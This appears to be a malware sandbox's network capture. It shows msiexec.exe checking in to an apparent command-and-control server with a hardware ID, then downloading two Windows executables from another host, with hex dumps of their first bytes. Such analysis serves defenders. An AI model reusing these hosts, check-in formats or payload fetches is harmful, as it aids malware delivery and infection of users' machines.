                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-11-17 23:15:35 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                              Content-Length: 115
                                                                                                                                                                                                                              Host: sliperyedhby.icu
                                                                                                                                                                                                                              2024-11-17 23:15:35 UTC115OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 74 4c 59 4d 65 35 2d 2d 32 32 32 6e 65 77 26 6a 3d 35 63 39 62 38 36 37 34 61 36 33 30 64 39 31 30 31 62 34 36 37 33 33 61 61 33 37 66 31 35 65 63 26 68 77 69 64 3d 41 37 31 34 46 37 31 30 39 42 42 34 30 31 32 32 45 31 33 41 38 38 33 44 39 35 41 43 33 41 38 34
                                                                                                                                                                                                                              Data Ascii: act=get_message&ver=4.0&lid=tLYMe5--222new&j=5c9b8674a630d9101b46733aa37f15ec&hwid=A714F7109BB40122E13A883D95AC3A84
                                                                                                                                                                                                                              2024-11-17 23:15:36 UTC1015INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Sun, 17 Nov 2024 23:15:35 GMT
                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=q8eg4eqsch4te4s440at2p9fgi; expires=Thu, 13-Mar-2025 17:02:14 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PoJIqeI9Ab%2F0xJV3NPiGaAYaf%2B2v5d3jCd%2BoxzUxhlcMEh6yE9StS0%2FqfQ0uipY%2BR4FHUEb5w%2Fe4DHDsJP2HdT1tK4uNwuZj%2B5gASkyXcz8e4kor8guNuZxOATiO9OdboRDY"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8e436c734c61e750-DEN
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=19051&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1016&delivery_rate=151829&cwnd=32&unsent_bytes=0&cid=2f853e7477d4a2a0&ts=549&x=0"
                                                                                                                                                                                                                              2024-11-17 23:15:36 UTC138INData Raw: 38 34 0d 0a 65 4c 2f 31 45 39 37 6a 56 75 33 46 76 30 34 56 6d 70 2f 4d 4a 59 6d 68 72 4a 65 66 58 37 6a 6d 71 59 69 56 7a 70 49 6e 37 6b 51 6a 78 4e 64 6d 2f 4e 6c 30 68 62 48 4c 50 6d 61 67 77 2b 4e 35 70 73 4c 49 2b 61 35 78 79 49 2f 52 37 66 6e 6a 34 56 4f 42 4e 67 47 52 68 6e 75 78 6b 77 72 43 71 64 73 38 53 76 6e 76 6b 31 58 6f 67 34 43 31 2b 53 75 61 33 4a 6d 6b 74 36 75 77 48 64 38 35 4a 51 3d 3d 0d 0a
                                                                                                                                                                                                                              Data Ascii: 84eL/1E97jVu3Fv04Vmp/MJYmhrJefX7jmqYiVzpIn7kQjxNdm/Nl0hbHLPmagw+N5psLI+a5xyI/R7fnj4VOBNgGRhnuxkwrCqds8Svnvk1Xog4C1+Sua3Jmkt6uwHd85JQ==
                                                                                                                                                                                                                              2024-11-17 23:15:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              10192.168.2.1649715172.67.185.544437084C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-11-17 23:15:36 UTC205OUTGET /ldr_cp_pa HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                              Host: cdn1.pixel-story.shop
                                                                                                                                                                                                                              2024-11-17 23:15:37 UTC905INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Sun, 17 Nov 2024 23:15:36 GMT
                                                                                                                                                                                                                              Content-Type: application/x-msdownload
                                                                                                                                                                                                                              Content-Length: 182784
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              ETag: "788f99934b8d093cd298c1f3f5d85678"
                                                                                                                                                                                                                              Last-Modified: Sun, 10 Nov 2024 20:17:45 GMT
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1j2RKLwhQhSd%2Bp1AHb4Rbm%2FahWMF9SMZRUwy3Ob6zitZz%2BICRXkuSFU772EYwp8ehkD7Zg3eG5Hesjq6sNdNyloznxh2GTn9kR%2FJQr6Uf0sP9JHa3tlhxCU%2FUGkMtSYh%2FbtOfgzU784%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8e436c7aae477d57-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1158&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2869&recv_bytes=819&delivery_rate=2358306&cwnd=251&unsent_bytes=0&cid=b3f2d4bc0fe98220&ts=382&x=0"
                                                                                                                                                                                                                              2024-11-17 23:15:37 UTC464INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c8 19 03 e9 8c 78 6d ba 8c 78 6d ba 8c 78 6d ba c7 00 6e bb 87 78 6d ba c7 00 68 bb 23 78 6d ba c7 00 69 bb 99 78 6d ba 4f fb 6e bb 99 78 6d ba 4f fb 69 bb 9e 78 6d ba 4f fb 68 bb c3 78 6d ba c7 00 6c bb 85 78 6d ba 8c 78 6c ba eb 78 6d ba 9f fc 64 bb 8d 78 6d ba 9f fc 6f bb 8d 78 6d ba 52 69 63 68 8c 78 6d ba 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 ab 12 31 67 00 00 00
                                                                                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$xmxmxmnxmh#xmixmOnxmOixmOhxmlxmxlxmdxmoxmRichxmPEL1g
                                                                                                                                                                                                                              2024-11-17 23:15:37 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ec f3 01 00 00 10 00 00 00 f4 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c a1 00 00 00 10 02 00 00 a2 00 00 00 f8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 78 1d 00 00 00 c0 02 00 00 12 00 00 00 9a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 1c 1d 00 00 00 e0 02 00 00 1e 00 00 00 ac 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii: .text `.rdatal@@.datax@.reloc@B
                                                                                                                                                                                                                              2024-11-17 23:15:37 UTC1369INData Raw: 19 00 00 c6 45 fc 1f 8d 8d bc f9 ff ff 68 38 81 42 00 e8 e0 19 00 00 68 44 81 42 00 8d 8d d4 f9 ff ff c6 45 fc 20 e8 cc 19 00 00 68 50 81 42 00 8d 8d ec f9 ff ff c6 45 fc 21 e8 b8 19 00 00 68 5c 81 42 00 8d 8d 04 fa ff ff c6 45 fc 22 e8 a4 19 00 00 68 68 81 42 00 8d 8d 1c fa ff ff c6 45 fc 23 e8 90 19 00 00 68 74 81 42 00 8d 8d 34 fa ff ff c6 45 fc 24 e8 7c 19 00 00 68 80 81 42 00 8d 8d 4c fa ff ff c6 45 fc 25 e8 68 19 00 00 68 8c 81 42 00 8d 8d 64 fa ff ff c6 45 fc 26 e8 54 19 00 00 68 98 81 42 00 8d 8d 7c fa ff ff c6 45 fc 27 e8 40 19 00 00 68 a4 81 42 00 8d 8d 94 fa ff ff c6 45 fc 28 e8 2c 19 00 00 68 b0 81 42 00 8d 8d ac fa ff ff c6 45 fc 29 e8 18 19 00 00 68 bc 81 42 00 8d 8d c4 fa ff ff c6 45 fc 2a e8 04 19 00 00 68 c8 81 42 00 8d 8d dc fa ff ff c6
                                                                                                                                                                                                                              Data Ascii: Eh8BhDBE hPBE!h\BE"hhBE#htB4E$|hBLE%hhBdE&ThB|E'@hBE(,hBE)hBE*hB
                                                                                                                                                                                                                              2024-11-17 23:15:37 UTC1369INData Raw: 8b c2 c1 e8 1f 03 c2 0f 84 88 00 00 00 3d aa aa aa 0a 0f 87 c1 00 00 00 8d 34 40 c1 e6 03 85 f6 75 04 33 c0 eb 3a 81 fe 00 10 00 00 72 29 8d 46 23 3b c6 0f 86 a5 00 00 00 50 e8 70 66 00 00 8b c8 83 c4 04 85 c9 0f 84 97 00 00 00 8d 41 23 83 e0 e0 89 48 fc eb 09 56 e8 52 66 00 00 83 c4 04 03 f0 a3 58 dd 42 00 a3 5c dd 42 00 89 35 60 dd 42 00 c7 45 ec 58 dd 42 00 68 58 dd 42 00 50 8d 55 ec c6 45 fc 62 8b cf e8 31 15 00 00 83 c4 08 a3 5c dd 42 00 68 60 55 40 00 6a 62 6a 18 8d 85 bc f6 ff ff c7 45 fc ff ff ff ff 50 e8 2e 66 00 00 68 b0 03 42 00 e8 75 69 00 00 83 c4 04 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 8b 4d f0 33 cd e8 c7 65 00 00 8b e5 5d c3 e8 50 3b 00 00 e8 5b 01 00 00 e8 1f c9 00 00 cc b9 30 d0 42 00 e8 11 59 00 00 68 ba 03 42 00 e8 33 69 00 00 59 c3
                                                                                                                                                                                                                              Data Ascii: =4@u3:r)F#;PpfA#HVRfXB\B5`BEXBhXBPUEb1\Bh`U@jbjEP.fhBuiMdY_^M3e]P;[0BYhB3iY
                                                                                                                                                                                                                              2024-11-17 23:15:37 UTC1369INData Raw: 8b ce ff 50 08 c6 45 fc 01 8d 4d ac 83 7d c0 0f 8b 55 d8 0f 47 4d ac 8b 45 dc 8b 7d bc 2b c2 89 55 e0 57 51 3b f8 77 29 83 7d dc 0f 8d 75 c8 8d 04 3a 0f 47 75 c8 89 45 d8 8d 04 16 50 e8 a3 77 00 00 8b 4d e0 8d 04 37 83 c4 0c c6 04 08 00 eb 0c ff 75 e8 8d 4d c8 57 e8 38 4c 00 00 8b 4d c0 83 f9 0f 76 2c 8b 55 ac 41 8b c2 81 f9 00 10 00 00 72 14 8b 50 fc 83 c1 23 2b c2 83 c0 fc 83 f8 1f 0f 87 d8 00 00 00 51 52 e8 63 64 00 00 83 c4 08 0f 10 4d c8 8d 4d 94 8b 75 c4 f3 0f 7e 45 d8 66 0f d6 45 a4 0f 57 c0 83 7d a8 0f 66 0f 7e c8 c7 06 04 12 42 00 66 0f d6 46 04 0f 47 c8 c7 45 d8 00 00 00 00 8d 46 04 c7 45 dc 0f 00 00 00 50 8d 45 e4 c6 45 c8 00 50 0f 11 4d 94 89 4d e4 c6 45 e8 01 e8 1a 74 00 00 8b 4d a8 83 c4 08 c7 06 50 12 42 00 83 f9 0f 76 28 8b 55 94 41 8b c2
                                                                                                                                                                                                                              Data Ascii: PEM}UGME}+UWQ;w)}u:GuEPwM7uMW8LMv,UArP#+QRcdMMu~EfEW}f~BfFGEFEPEEPMMEtMPBv(UA
                                                                                                                                                                                                                              2024-11-17 23:15:37 UTC1369INData Raw: 85 c0 74 09 50 e8 e8 b4 00 00 83 c4 04 8b 45 b0 c7 45 b8 00 00 00 00 85 c0 74 09 50 e8 d1 b4 00 00 83 c4 04 8b 45 a8 c7 45 b0 00 00 00 00 85 c0 74 09 50 e8 ba b4 00 00 83 c4 04 8d 4d a4 c7 45 a8 00 00 00 00 e8 8d 4f 00 00 b8 02 00 00 00 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 8b e5 5d 8b e3 5b c3 68 4c 7f 42 00 e8 bc 50 00 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8d 41 08 50 0f b6 45 08 50 e8 66 56 00 00 83 c4 08 5d c2 04 00 cc cc cc cc cc cc cc cc 55 8b ec 56 8b 75 08 57 8b 7d 0c 3b f7 74 19 53 8d 59 08 0f b6 06 53 50 e8 3a 56 00 00 88 06 83 c4 08 46 3b f7 75 ec 5b 5f 8b c6 5e 5d c2 08 00 55 8b ec 8d 41 08 50 0f b6 45 08 50 e8 22 57 00 00 83 c4 08 5d c2 04 00 cc cc cc cc cc cc cc cc 55 8b ec 56 8b 75 08 57 8b 7d 0c 3b f7 74 19 53 8d 59 08
                                                                                                                                                                                                                              Data Ascii: tPEEtPEEtPMEOMdY_^][hLBPUAPEPfV]UVuW};tSYSP:VF;u[_^]UAPEP"W]UVuW};tSY
                                                                                                                                                                                                                              2024-11-17 23:15:37 UTC1369INData Raw: 15 58 cb 42 00 89 45 e4 b8 ff ff ff 7f 2b c1 89 4d ec 89 55 dc 3b c2 0f 82 36 03 00 00 83 3d 44 cb 42 00 0f 8d 7d c0 b8 30 cb 42 00 c7 45 d0 00 00 00 00 0f 47 05 30 cb 42 00 be 48 cb 42 00 83 3d 5c cb 42 00 0f 0f 57 c0 89 45 e0 0f 47 35 48 cb 42 00 03 d1 89 75 e4 be 0f 00 00 00 c7 45 d4 00 00 00 00 89 55 e8 0f 11 45 c0 3b d6 76 76 8b f2 83 ce 0f 81 fe ff ff ff 7f 76 29 b9 00 00 00 80 be ff ff ff 7f 83 c1 23 51 e8 15 56 00 00 83 c4 04 85 c0 0f 84 c3 02 00 00 8d 78 23 83 e7 e0 89 47 fc eb 34 b8 16 00 00 00 3b f0 0f 42 f0 8d 46 01 85 c0 75 04 33 ff eb 25 3d 00 10 00 00 72 0d 8d 48 23 3b c8 0f 86 8c 02 00 00 eb bb 50 e8 d0 55 00 00 83 c4 04 8b f8 8b 55 e8 8b 4d ec 8b 45 e0 89 7d c0 51 50 57 89 55 d0 89 75 d4 e8 40 6c 00 00 ff 75 dc 8b 45 ec ff 75 e4 03 c7 50
                                                                                                                                                                                                                              Data Ascii: XBE+MU;6=DB}0BEG0BHB=\BWEG5HBuEUE;vvv)#QVx#G4;BFu3%=rH#;PUUME}QPWUu@luEuP
                                                                                                                                                                                                                              2024-11-17 23:15:37 UTC1369INData Raw: 8d 43 01 3d ff ff ff 7f 77 3e 03 c0 75 bf 33 db eb 0b 50 e8 33 51 00 00 83 c4 04 8b d8 8b 45 fc 89 77 10 03 f6 56 ff 75 f8 89 1f 53 89 47 14 e8 a6 67 00 00 83 c4 0c 33 c0 66 89 04 1e 8b c7 5f 5e 5b 8b e5 5d c2 04 00 e8 8d ec ff ff e8 28 ed ff ff e8 4c b4 00 00 cc cc cc 55 8b ec 6a ff 68 8d f7 41 00 64 a1 00 00 00 00 50 83 ec 20 a1 80 c0 42 00 33 c5 89 45 f0 56 57 50 8d 45 f4 64 a3 00 00 00 00 89 55 d4 8b f9 8b 75 08 0f 57 c0 8b 45 0c 66 0f d6 45 e4 c7 45 ec 00 00 00 00 89 75 e4 89 75 e8 89 45 ec c7 45 fc 00 00 00 00 3b fa 0f 84 fa 00 00 00 0f 1f 40 00 0f 57 c0 89 7d dc 0f 11 06 c7 46 10 00 00 00 00 8b cf c7 46 14 00 00 00 00 83 7f 14 07 8b 47 10 89 45 d8 76 05 8b 0f 89 4d dc 3d fe ff ff 7f 0f 87 eb 00 00 00 83 f8 07 77 15 89 46 10 c7 46 14 07 00 00 00 0f
                                                                                                                                                                                                                              Data Ascii: C=w>u3P3QEwVuSGg3f_^[](LUjhAdP B3EVWPEdUuWEfEEuuEE;@W}FFGEvM=wFF
                                                                                                                                                                                                                              2024-11-17 23:15:37 UTC1369INData Raw: 50 fc 83 c1 23 2b c2 83 c0 fc 83 f8 1f 0f 87 9e 04 00 00 51 52 e8 73 4f 00 00 83 c4 08 e9 71 04 00 00 6a 00 6a 00 6a 00 6a 00 68 68 84 42 00 ff 15 64 11 42 00 8b f8 85 ff 75 6b 6a 1f 0f 57 c0 89 85 f0 e4 ff ff 68 0c 85 42 00 8d 8d e0 e4 ff ff 89 85 f4 e4 ff ff 0f 11 85 e0 e4 ff ff e8 be f3 ff ff 8b 8d f4 e4 ff ff 83 f9 0f 0f 86 21 04 00 00 8b 95 e0 e4 ff ff 41 8b c2 81 f9 00 10 00 00 72 14 8b 50 fc 83 c1 23 2b c2 83 c0 fc 83 f8 1f 0f 87 1a 04 00 00 51 52 e8 ef 4e 00 00 83 c4 08 e9 ed 03 00 00 6a 00 ff b5 c0 e5 ff ff ff b5 b8 e5 ff ff 57 ff 15 68 11 42 00 8b c8 89 8d dc e4 ff ff 85 c9 75 6e 6a 1c 0f 57 c0 89 85 f0 e4 ff ff 68 2c 85 42 00 8d 8d e0 e4 ff ff 89 85 f4 e4 ff ff 0f 11 85 e0 e4 ff ff e8 32 f3 ff ff 8b 8d f4 e4 ff ff 83 f9 0f 76 2f 8b 95 e0 e4 ff
                                                                                                                                                                                                                              Data Ascii: P#+QRsOqjjjjhhBdBukjWhB!ArP#+QRNjWhBunjWh,B2v/
                                                                                                                                                                                                                              2024-11-17 23:15:37 UTC1369INData Raw: 16 00 00 e8 60 56 00 00 a1 80 c0 42 00 33 c4 89 84 24 54 16 00 00 56 57 ff 15 0c 10 42 00 6a 00 50 ff 15 44 11 42 00 6a 00 68 10 27 00 00 ff 15 10 10 42 00 8d 84 24 50 15 00 00 50 6a 00 6a 00 6a 1a 6a 00 ff 15 3c 11 42 00 85 c0 0f 84 80 00 00 00 6a 1b 0f 57 c0 c7 84 24 84 00 00 00 00 00 00 00 68 bc 85 42 00 8d 4c 24 78 0f 29 44 24 78 c7 84 24 8c 00 00 00 00 00 00 00 e8 48 ee ff ff 8b 8c 24 84 00 00 00 83 f9 0f 76 2d 8b 54 24 70 41 8b c2 81 f9 00 10 00 00 72 14 8b 50 fc 83 c1 23 2b c2 83 c0 fc 83 f8 1f 0f 87 7e 09 00 00 51 52 e8 7e 49 00 00 83 c4 08 83 c8 ff 5f 5e 8b 8c 24 54 16 00 00 33 cc e8 ba 45 00 00 8b e5 5d c2 10 00 8d 8c 24 50 15 00 00 8d 51 01 8a 01 41 84 c0 75 f9 2b ca c7 84 24 80 00 00 00 00 00 00 00 8d 84 24 50 15 00 00 c7 84 24 84 00 00 00 00
                                                                                                                                                                                                                              Data Ascii: `VB3$TVWBjPDBjh'B$PPjjjj<BjW$hBL$x)D$x$H$v-T$pArP#+~QR~I_^$T3E]$PQAu+$$P$


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              11192.168.2.1649716172.67.185.544437084C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-11-17 23:15:38 UTC174OUTGET /runcl.bin HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                                                                                                                              Host: cdn1.pixel-story.shop
                                                                                                                                                                                                                              2024-11-17 23:15:39 UTC897INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Sun, 17 Nov 2024 23:15:39 GMT
                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                              Content-Length: 943784
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              ETag: "3f58a517f1f4796225137e7659ad2adb"
                                                                                                                                                                                                                              Last-Modified: Tue, 05 Nov 2024 11:58:57 GMT
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HYBIBKDqlUv%2FSyUS5k7qABC4jHyeNTKPZYBXhFcX0EgocvOOa5YHlQjlDLkTmGloqlx6NbpU%2FJ4bvaomvCoYoxjGtzf5ieZV7grpfVvogfv3U1JrJRo5l0UfhOyvU5IGagQJKfESmm4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8e436c88eb412e5f-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1433&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2869&recv_bytes=788&delivery_rate=1891574&cwnd=247&unsent_bytes=0&cid=d285401f0f3cdc24&ts=377&x=0"
                                                                                                                                                                                                                              2024-11-17 23:15:39 UTC472INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 6d f2 d5 2c 0c 9c 86 2c 0c 9c 86 2c 0c 9c 86 98 90 6d 86 0f 0c 9c 86 98 90 6f 86 b1 0c 9c 86 98 90 6e 86 0f 0c 9c 86 b2 ac 5b 86 2d 0c 9c 86 fe 68 9f 87 38 0c 9c 86 fe 68 99 87 04 0c 9c 86 fe 68 98 87 3e 0c 9c 86 25 74 1f 86 25 0c 9c 86 25 74 0f 86 09 0c 9c 86 2c 0c 9d 86 04 0e 9c 86 c7 68 92 87 7c 0c 9c 86 c7 68 9f 87 2d 0c 9c 86 c7 68 63 86 2d 0c 9c 86 2c 0c 0b 86 2e 0c 9c
                                                                                                                                                                                                                              Data Ascii: MZ@(!L!This program cannot be run in DOS mode.$hm,,,mon[-h8hh>%t%%t,h|h-hc-,.
                                                                                                                                                                                                                              2024-11-17 23:15:39 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 2f 0c 00 18 00 00 00 00 0c 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 09 00 8c 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 05 b5 09 00 00 10 00 00 00 b6 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a2 f7 02 00 00 d0 09 00 00 f8 02 00 00 ba 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 34 70 00 00 00 d0 0c 00 00 48 00 00 00 b2 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 68 d7 00 00 00 50 0d 00 00 d8 00 00 00 fa 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 20 76 00 00 00 30 0e 00 00 78 00 00 00 d2 0d
                                                                                                                                                                                                                              Data Ascii: /@.text `.rdata@@.data4pH@.rsrchP@@.reloc v0x
                                                                                                                                                                                                                              2024-11-17 23:15:39 UTC1369INData Raw: 00 8d 4d b8 e8 28 e9 00 00 8d 4d d8 e8 20 e9 00 00 8d 4d a8 e8 18 e9 00 00 8d 4d c8 e8 10 e9 00 00 5f 5e 5b 8b e5 5d c3 55 8b ec 53 56 8b f1 6a 04 5b 8b 46 0c 39 46 08 74 20 53 e8 ba f0 01 00 59 8b 4d 08 8b 09 89 08 8b 56 08 8b 4e 04 89 04 91 ff 46 08 5e 5b 5d c2 04 00 8d 0c 00 6a 08 58 3b c8 72 02 8b c1 33 c9 89 46 0c f7 e3 57 0f 90 c1 f7 d9 0b c8 51 e8 af f0 01 00 83 7e 04 00 8b f8 59 74 1f 8b 46 08 85 c0 74 18 c1 e0 02 50 ff 76 04 57 e8 27 00 02 00 ff 76 04 e8 93 f0 01 00 83 c4 10 89 7e 04 5f eb 91 55 8b ec 56 8b f1 57 33 ff c7 06 10 d9 49 00 39 7e 08 76 1c 8b 46 04 6a 04 ff 34 b8 e8 22 f0 01 00 8b 46 04 59 59 83 24 b8 00 47 3b 7e 08 72 e4 ff 76 04 83 66 08 00 e8 4e f0 01 00 f6 45 08 01 59 74 0a 6a 10 56 e8 f8 ef 01 00 59 59 5f 8b c6 5e 5d c2 04 00 55
                                                                                                                                                                                                                              Data Ascii: M(M MM_^[]USVj[F9Ft SYMVNF^[]jX;r3FWQ~YtFtPvW'v~_UVW3I9~vFj4"FYY$G;~rvfNEYtjVYY_^]U
                                                                                                                                                                                                                              2024-11-17 23:15:39 UTC1369INData Raw: f8 01 75 74 53 57 33 db 8b 46 14 8b 3c 03 85 ff 75 38 83 c3 04 81 fb 00 10 00 00 7c eb 50 e8 b7 eb 01 00 59 8b 4e 10 5f 5b 85 c9 74 06 8b 01 6a 01 ff 10 6a 04 ff 76 04 e8 56 eb 01 00 59 59 c7 06 24 d9 49 00 5e 8b e5 5d c3 8b 47 04 89 45 fc 8b 47 08 8b 48 20 85 c9 74 06 51 e8 66 11 00 00 6a 0c 57 e8 2b eb 01 00 8b 45 fc 8b f8 59 59 85 c0 75 d7 8b 46 14 eb 9a 3d ff ff ff 7f 74 85 48 89 01 eb bb 55 8b ec 56 8b f1 e8 5e ff ff ff f6 45 08 01 74 0a 6a 18 56 e8 f6 ea 01 00 59 59 8b c6 5e 5d c2 04 00 53 56 8b f1 57 33 ff 6a 10 c7 06 14 d9 49 00 89 7e 08 c7 46 0c 00 00 00 80 e8 dd ea 01 00 bb 00 10 00 00 53 c7 00 10 d9 49 00 89 78 04 89 78 08 89 78 0c 89 46 10 e8 f0 ea 01 00 59 59 89 46 14 8b cf 8b 46 14 89 3c 01 83 c1 04 3b cb 7c f3 6a 04 e8 a5 ea 01 00 59 5f c7
                                                                                                                                                                                                                              Data Ascii: utSW3F<u8|PYN_[tjjvVYY$I^]GEGH tQfjW+EYYuF=tHUV^EtjVYY^]SVW3jI~FSIxxxFYYFF<;|jY_
